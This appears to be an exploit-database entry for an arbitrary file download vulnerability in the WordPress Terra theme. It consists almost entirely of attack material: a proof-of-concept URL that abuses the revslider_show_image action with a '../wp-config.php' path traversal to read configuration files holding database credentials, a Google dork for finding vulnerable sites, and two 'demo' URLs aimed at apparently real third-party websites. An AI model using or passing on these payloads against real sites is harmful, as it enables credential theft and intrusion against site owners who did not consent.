Wordpress Theme Terra Arbitrary File Download Vulnerability

2015-01-18T00:00:00
ID 1337DAY-ID-23142
Type zdt
Reporter terrorist
Modified 2015-01-18T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################
# Exploit Title: Wordpress Theme Terra Arbitrary File Download Vulnerability
# Date: 18/01/2015
# Exploit Author: t3rr0rist - GHC (Georgian Hacking Community) team
# Contact : mrinjector17@gmail.com
# Tested on: Linux
# Google Dork: inurl:"wp-content/themes/terra/"
######################
  
# Proof of Concept

http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 

#Demo

http://bh-3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://mcity.se/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2016-04-20]  #